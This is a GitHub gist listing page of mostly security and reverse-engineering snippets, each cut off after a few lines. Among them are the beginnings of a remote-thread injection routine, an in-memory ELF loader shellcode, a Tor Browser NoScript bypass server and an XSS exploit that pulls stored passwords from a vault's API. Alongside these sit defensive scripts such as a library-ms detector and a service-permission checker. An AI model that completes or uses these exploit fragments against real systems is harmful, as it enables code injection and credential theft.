CaledoniaProject
CaledoniaProject
/ Makefile
Created
October 28, 2018 15:19
— forked from llj098/Makefile
a sample tcp server runs in kernel
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| obj-m += tcp_svr_sample.o | |
| all: | |
| make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules | |
| clean: | |
| make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clea |
CaledoniaProject
/ sedebug_rtlcreatethread.c
Created
October 26, 2018 06:15
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */ | |
| #include <windows.h> | |
| #include <stdio.h> | |
| typedef DWORD(WINAPI *prototype_RtlCreateUserThread)( | |
| HANDLE ProcessHandle, | |
| PSECURITY_DESCRIPTOR SecurityDescriptor, | |
| BOOL CreateSuspended, | |
| ULONG StackZeroBits, | |
| PULONG StackReserved, |
CaledoniaProject
/ AutoFunc.py
Created
October 25, 2018 16:02
— forked from 0xgalz/AutoFunc.py
IDAPython- Change Function Names in IDA According to their corresponding debug prints
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import idc | |
| import idautils | |
| import idaapi | |
| FUNCTIONS_REGISTERS = {"g_log": "rcx", "g_log_error": "rdx"} | |
| def get_string_for_function(call_func_addr, register): | |
| """ | |
| :param start_addr: The function call address |
CaledoniaProject
/ Unlock-OfficeDocumentMacro.ps1
Created
October 21, 2018 07:21
Unlock-OfficeDocumentMacro
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Credit to https://chentiangemalc.wordpress.com/2012/01/17/powershell-script-to-remove-office-macro-protection/ | |
| # Function to unlock office 2000-2003 document by @chentiangemalc | |
| # Proof-of-Concept Code lacking performance optimization & error handling | |
| # This should not be considered example of how to write PowerShell code. | |
| # Binary "IndexOf" | |
| # too lazy (or busy…) to write this code in PowerShell, couldn’t find any good PowerShell example | |
| # And this is fast. From http://stackoverflow.com/users/649008/foubar | |
| # at http://stackoverflow.com/questions/283456/byte-array-pattern-search |
CaledoniaProject
/ Get-LibraryMS.ps1
Created
October 13, 2018 02:19
— forked from countercept/Get-LibraryMS.ps1
Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID. In particular, the <url> element with shell command.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-LibraryMS { | |
| <# | |
| .SYNOPSIS | |
| Author: Jayden Zheng (@fuseyjz) | |
| Checks the %USERPROFILE% directory for any file with library-ms extension and extract the CLSID. | |
| In particular, <url> element with shell command. | |
| Blog: pending release |
CaledoniaProject
/ mem-loader.asm
Created
October 7, 2018 23:54
— forked from zznop/mem-loader.asm
Fun little loader shellcode that executes an ELF in-memory using an anonymous file descriptor (inspired by https://x-c3ll.github.io/posts/fileless-memfd_create/)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; | |
| ;;; | |
| ;;; Copyright (C), zznop, zznop0x90@gmail.com | |
| ;;; | |
| ;;; This software may be modified and distributed under the terms | |
| ;;; of the MIT license. See the LICENSE file for details. | |
| ;;; | |
| ;;; DESCRIPTION | |
| ;;; | |
| ;;; This PoC shellcode is meant to be compiled as a blob and prepended to a ELF |
CaledoniaProject
/ TorBrowser_7.x_NoScript_bypass.py
Created
September 11, 2018 05:42
— forked from x0rz/TorBrowser_7.x_NoScript_bypass.py
Tor Browser 7.x NoScript bypass vulnerability https://twitter.com/Zerodium/status/1039127214602641409
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer | |
| PORT_NUMBER = 31337 | |
| class myHandler(BaseHTTPRequestHandler): | |
| #Handler for the GET requests | |
| def do_GET(self): | |
| self.send_response(200) |
CaledoniaProject
/ checksvc.py
Created
September 9, 2018 03:11
— forked from wdormann/checksvc.py
Check for insecure services on Windows
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import subprocess | |
| import ctypes | |
| # See: https://blogs.msmvps.com/erikr/2007/09/26/set-permissions-on-a-specific-service-windows/ | |
| svcinfo = {} | |
| nonadmin = ['AU', 'AN', 'BG', 'BU', 'DG', 'WD', 'IU', 'LG'] | |
| FNULL = open(os.devnull, 'w') |
CaledoniaProject
/ rpm-digital-signature.sh
Created
September 5, 2018 23:23
— forked from fernandoaleman/rpm-digital-signature.sh
How to sign your custom RPM package with GPG key
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # How to sign your custom RPM package with GPG key | |
| # Step: 1 | |
| # Generate gpg key pair (public key and private key) | |
| # | |
| # You will be prompted with a series of questions about encryption. | |
| # Simply select the default values presented. You will also be asked | |
| # to create a Real Name, Email Address and Comment (comment optional). | |
| # | |
| # If you get the following response: |
CaledoniaProject
/ password_vault_exploit.js
Created
August 24, 2018 01:18
— forked from shawarkhanethicalhacker/password_vault_exploit.js
XSS Exploit code for retrieving passwords stored in a Password Vault
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //Exploit Code by Shawar Khan | |
| var data_chunks = ''; | |
| // Capturing Records from API | |
| fetch('https://redacted.com/api/v3/records/all').then((resp) => resp.text()).then(function(data) { | |
| // Holds the records in as String | |
| var allrecords = data; | |
| // converting response to JSON |